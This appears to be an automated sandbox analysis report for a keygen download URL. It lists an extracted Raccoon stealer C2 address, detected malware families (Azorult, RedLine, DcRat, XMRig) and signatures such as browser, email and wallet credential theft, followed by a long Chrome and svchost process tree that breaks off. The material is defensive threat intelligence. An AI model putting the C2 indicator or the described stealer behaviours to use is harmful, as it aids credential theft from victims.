Resubmissions

18-04-2021 09:11

210418-l2b52pc3js 10

Analysis

  • max time kernel
    1792s
  • max time network
    1520s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    18-04-2021 09:11

General

  • Target

    https://keygenit.com/d/59def7ae481psn8p58q.html

  • Sample

    210418-l2b52pc3js

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 55 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 15 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 61 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
    • Modifies registry class
    PID:2512
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2812
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2796
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/59def7ae481psn8p58q.html
      1⤵
      • Enumerates system info in registry
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4804
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffda5bf4f50,0x7ffda5bf4f60,0x7ffda5bf4f70
        2⤵
          PID:4896
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1532 /prefetch:2
          2⤵
            PID:4268
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1724 /prefetch:8
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4288
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 /prefetch:8
            2⤵
              PID:4092
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2892 /prefetch:1
              2⤵
                PID:744
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2900 /prefetch:1
                2⤵
                  PID:1052
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
                  2⤵
                    PID:1652
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                    2⤵
                      PID:1800
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
                      2⤵
                        PID:1824
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
                        2⤵
                          PID:1344
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4780 /prefetch:8
                          2⤵
                            PID:4660
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6104 /prefetch:8
                            2⤵
                              PID:4648
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6288 /prefetch:8
                              2⤵
                                PID:4948
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6132 /prefetch:8
                                2⤵
                                  PID:4280
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6300 /prefetch:8
                                  2⤵
                                    PID:752
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6704 /prefetch:8
                                    2⤵
                                      PID:508
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6372 /prefetch:8
                                      2⤵
                                        PID:1040
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6312 /prefetch:8
                                        2⤵
                                          PID:1680
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6296 /prefetch:8
                                          2⤵
                                            PID:1152
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7056 /prefetch:8
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1984
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6832 /prefetch:8
                                            2⤵
                                              PID:1828
                                            • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                              "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                              2⤵
                                                PID:2204
                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff66f47a890,0x7ff66f47a8a0,0x7ff66f47a8b0
                                                  3⤵
                                                    PID:4672
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7188 /prefetch:8
                                                  2⤵
                                                    PID:4616
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6940 /prefetch:8
                                                    2⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2332
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6344 /prefetch:8
                                                    2⤵
                                                      PID:192
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6172 /prefetch:8
                                                      2⤵
                                                        PID:1976
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6272 /prefetch:8
                                                        2⤵
                                                          PID:4852
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6104 /prefetch:8
                                                          2⤵
                                                            PID:3320
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6192 /prefetch:8
                                                            2⤵
                                                              PID:5008
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5776 /prefetch:8
                                                              2⤵
                                                                PID:4664
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5208 /prefetch:8
                                                                2⤵
                                                                  PID:3584
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7108 /prefetch:8
                                                                  2⤵
                                                                    PID:4180
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5596 /prefetch:8
                                                                    2⤵
                                                                      PID:4848
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6700 /prefetch:8
                                                                      2⤵
                                                                        PID:1988
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7088 /prefetch:8
                                                                        2⤵
                                                                          PID:352
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6956 /prefetch:8
                                                                          2⤵
                                                                            PID:1100
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7448 /prefetch:8
                                                                            2⤵
                                                                              PID:2132
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7576 /prefetch:8
                                                                              2⤵
                                                                                PID:204
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7712 /prefetch:8
                                                                                2⤵
                                                                                  PID:3324
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7584 /prefetch:8
                                                                                  2⤵
                                                                                    PID:936
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7836 /prefetch:8
                                                                                    2⤵
                                                                                      PID:2400
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8120 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4876
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7832 /prefetch:8
                                                                                        2⤵
                                                                                          PID:2976
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8384 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4200
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8512 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4272
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8496 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4348
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8636 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:2080
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8912 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:3288
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9040 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:5148
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9176 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:5160
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8240 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:5224
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4048 /prefetch:8
                                                                                                          2⤵
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:5272
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:5308
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4012 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:5384
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9340 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:5448
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:8
                                                                                                                2⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:5516
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9356 /prefetch:8
                                                                                                                2⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:5564
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9364 /prefetch:8
                                                                                                                2⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:5616
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=768 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:5724
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9136 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5740
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,382712738498088356,18216628491148139389,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2588 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:5836
                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                  1⤵
                                                                                                                    PID:2704
                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                    1⤵
                                                                                                                      PID:2532
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                      1⤵
                                                                                                                        PID:1952
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                        1⤵
                                                                                                                          PID:1404
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                          1⤵
                                                                                                                            PID:1348
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                            1⤵
                                                                                                                              PID:1188
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                              1⤵
                                                                                                                                PID:1064
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                1⤵
                                                                                                                                  PID:492
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
